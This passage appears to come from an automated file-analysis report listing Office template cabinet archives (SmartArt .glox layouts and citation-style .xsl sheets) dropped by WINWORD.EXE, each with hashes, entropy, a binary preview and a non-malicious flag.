                            Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):31562
                            Entropy (8bit):7.81640835713744
                            Encrypted:false
                            SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                            MD5:1D6F8E73A0662A48D332090A4C8C898F
                            SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                            SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                            SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                            Malicious:false
                            Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):22008
                            Entropy (8bit):7.662386258803613
                            Encrypted:false
                            SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                            MD5:ABBF10CEE9480E41D81277E9538F98CB
                            SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                            SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                            SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                            Malicious:false
                            Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):31008
                            Entropy (8bit):7.806058951525675
                            Encrypted:false
                            SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                            MD5:E033CCBC7BA787A2F824CE0952E57D44
                            SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                            SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                            SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                            Malicious:false
                            Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):31835
                            Entropy (8bit):7.81952379746457
                            Encrypted:false
                            SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                            MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                            SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                            SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                            SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                            Malicious:false
                            Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):22149
                            Entropy (8bit):7.659898883631361
                            Encrypted:false
                            SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                            MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                            SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                            SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                            SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                            Malicious:false
                            Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):20554
                            Entropy (8bit):7.612044504501488
                            Encrypted:false
                            SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                            MD5:486CBCB223B873132FFAF4B8AD0AD044
                            SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                            SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                            SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                            Malicious:false
                            Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):31482
                            Entropy (8bit):7.808057272318224
                            Encrypted:false
                            SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                            MD5:F10DF902980F1D5BEEA96B2C668408A7
                            SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                            SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                            SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                            Malicious:false
                            Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):20457
                            Entropy (8bit):7.612540359660869
                            Encrypted:false
                            SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                            MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                            SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                            SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                            SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                            Malicious:false
                            Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):32833
                            Entropy (8bit):7.825460303519308
                            Encrypted:false
                            SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                            MD5:205AF51604EF96EF1E8E60212541F742
                            SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                            SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                            SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                            Malicious:false
                            Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):33610
                            Entropy (8bit):7.8340762758330476
                            Encrypted:false
                            SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                            MD5:51804E255C573176039F4D5B55C12AB2
                            SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                            SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                            SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                            Malicious:false
                            Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):25314
                            Entropy (8bit):7.729848360340861
                            Encrypted:false
                            SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                            MD5:C47E3430AF813DF8B02E1CB4829DD94B
                            SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                            SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                            SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                            Malicious:false
                            Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):30957
                            Entropy (8bit):7.808231503692675
                            Encrypted:false
                            SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                            MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                            SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                            SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                            SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                            Malicious:false
                            Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):20235
                            Entropy (8bit):7.61176626859621
                            Encrypted:false
                            SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                            MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                            SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                            SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                            SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                            Malicious:false
                            Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):21791
                            Entropy (8bit):7.65837691872985
                            Encrypted:false
                            SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                            MD5:7BF88B3CA20EB71ED453A3361908E010
                            SHA1:F75F86557051160507397F653D7768836E3B5655
                            SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
